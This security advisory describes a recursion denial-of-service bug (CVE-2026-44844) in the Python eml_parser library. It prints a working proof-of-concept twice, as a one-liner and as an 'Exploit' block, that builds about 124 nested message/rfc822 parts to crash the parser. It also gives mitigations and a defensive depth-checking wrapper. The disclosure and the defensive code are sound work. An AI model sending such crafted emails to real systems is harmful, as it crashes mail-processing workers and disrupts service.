eml_parser (Python), Recursion Denial of Service, CVE-2026-44844 (Medium)


The vulnerability resides in `EmlParser.get_raw_body_text()` (eml_parser/parser.py). For each part whose main type is `multipart/*`, the function iterates over its sub-parts. When a sub-part of type `message/rfc822` is encountered, the function calls itself recursively on the embedded message. There is no depth limit or early-abort mechanism. CPython’s default recursion limit is 1000 frames, and each nesting level of `message/rfc822` adds approximately 8 frames to the call stack (parser code plus `_header_value_parser` calls), so about 120 nested levels are enough to exceed the limit. The resulting `RecursionError` is not caught anywhere in the call chain: it propagates out of `decode_email_bytes()` and aborts processing of the email entirely. A malformed EML file of only 12 KB (containing around 120 nested `message/rfc822` parts) suffices to trigger the crash. The crash is deterministic on a stock installation (e.g., Python 3.12.3, eml_parser 3.0.0, Ubuntu 24.04 aarch64); no special configuration or large attachments are required.
Platform: Python/eml_parser
Version: ≤3.0.0
Vulnerability: Recursion DoS
Severity: Medium
Date: 2026-05-05

Prediction: Patch 2026-05

Analytics under What Undercode Say:

Check installed version:
pip show eml_parser

Verify Python recursion limit:
python3 -c "import sys; print(sys.getrecursionlimit())"

Reproduce crash (PoC):
python3 -c "
import eml_parser

def build_poc(depth=124):
    # innermost message: a plain-text part
    inner = b'From: a@a\r\nTo: b@b\r\nContent-Type: text/plain\r\n\r\n.\r\n'
    msg = inner
    # wrap it in one multipart/mixed + message/rfc822 layer per iteration
    for i in range(depth):
        b = f'B{i}'.encode()
        msg = (b'Content-Type: multipart/mixed; boundary=\"' + b + b'\"\r\n\r\n'
               b'--' + b + b'\r\nContent-Type: message/rfc822\r\n\r\n') + msg + b'\r\n--' + b + b'--\r\n'
    return msg

ep = eml_parser.EmlParser()
ep.decode_email_bytes(build_poc())
"

Exploit:

import eml_parser

def build_poc(depth=124):
    # innermost message: a plain-text part
    inner = b"From: a@a\r\nTo: b@b\r\nContent-Type: text/plain\r\n\r\n.\r\n"
    msg = inner
    # wrap it in one multipart/mixed + message/rfc822 layer per iteration
    for i in range(depth):
        b = f"B{i}".encode()
        msg = (b'Content-Type: multipart/mixed; boundary="' + b + b'"\r\n\r\n'
               b'--' + b + b'\r\nContent-Type: message/rfc822\r\n\r\n') + msg + b'\r\n--' + b + b'--\r\n'
    return msg

ep = eml_parser.EmlParser()
ep.decode_email_bytes(build_poc())  # RecursionError after ~120 nested parts

Protection from this CVE

Apply a patch or update to a fixed version (check for eml_parser ≥3.0.1). Implement explicit recursion-depth checks in the parsing code. Wrap calls to `decode_email_bytes()` in a `try-except` block that handles `RecursionError`, so that one hostile message does not abort the whole batch. For defense in depth, validate EML files at the mail server level and reject messages with excessive nesting.
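A defensive wrapper implementing the mitigations above, added here as an example (not eml_parser's own code): it bounds `message/rfc822` nesting with a non-recursive walk before the real parser runs, and contains a `RecursionError` if one still escapes. It assumes `parse` is `eml_parser.EmlParser().decode_email_bytes` (not imported, so the block runs without the package) and uses a constructed nested message as sample input.

```python
"""Defensive wrapper for a recursive EML parser (added example, not eml_parser code).
`parse` stands in for eml_parser.EmlParser().decode_email_bytes, assumed not imported."""
import email
from typing import Callable, Optional

MAX_RFC822_DEPTH = 10  # assumption: legitimate mail rarely nests forwards this deep

def rfc822_nesting_depth(raw: bytes) -> int:
    """Deepest chain of message/rfc822 parts in a raw message, found with an
    explicit stack instead of recursion so the check itself cannot overflow."""
    deepest = 0
    stack = [(email.message_from_bytes(raw), 0)]
    while stack:
        part, depth = stack.pop()
        deepest = max(deepest, depth)
        if part.is_multipart():  # also true for message/rfc822 containers
            for child in part.get_payload():
                nested = child.get_content_type() == "message/rfc822"
                stack.append((child, depth + 1 if nested else depth))
    return deepest

def parse_eml_safely(raw: bytes, parse: Callable[[bytes], dict],
                     max_depth: int = MAX_RFC822_DEPTH) -> Optional[dict]:
    """Return parse(raw), or None when the message nests too deeply or the parser
    still overflows. A None result lets a batch skip one hostile message."""
    try:
        if rfc822_nesting_depth(raw) > max_depth:
            return None  # rejected before the recursive parser ever sees it
        return parse(raw)
    except RecursionError:  # also covers the pre-check on absurdly deep input
        return None

def build_nested(depth: int) -> bytes:
    """Constructed sample input: `depth` message/rfc822 layers around a text part."""
    msg = b"From: a@a\r\nTo: b@b\r\nContent-Type: text/plain\r\n\r\n.\r\n"
    for i in range(depth):
        b = f"B{i}".encode()
        msg = (b'Content-Type: multipart/mixed; boundary="' + b + b'"\r\n\r\n'
               b"--" + b + b"\r\nContent-Type: message/rfc822\r\n\r\n"
               + msg + b"\r\n--" + b + b"--\r\n")
    return msg

def crashing_parser(raw: bytes) -> dict:
    """Stand-in that simulates the advisory's crash inside the real parser."""
    raise RecursionError("maximum recursion depth exceeded")

if __name__ == "__main__":
    print(parse_eml_safely(build_nested(3), lambda r: {"size": len(r)}))   # parsed
    print(parse_eml_safely(build_nested(30), lambda r: {"size": len(r)}))  # None
```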

Impact

Denial of service: a single 12 KB EML crashes a worker. In a long-running processing pipeline, the unhandled exception aborts the entire batch unless the call is wrapped in `try-except`. Attackers can send such messages without authentication, potentially keeping workers in a perpetual restart loop.


Sources:

Reported By: github.com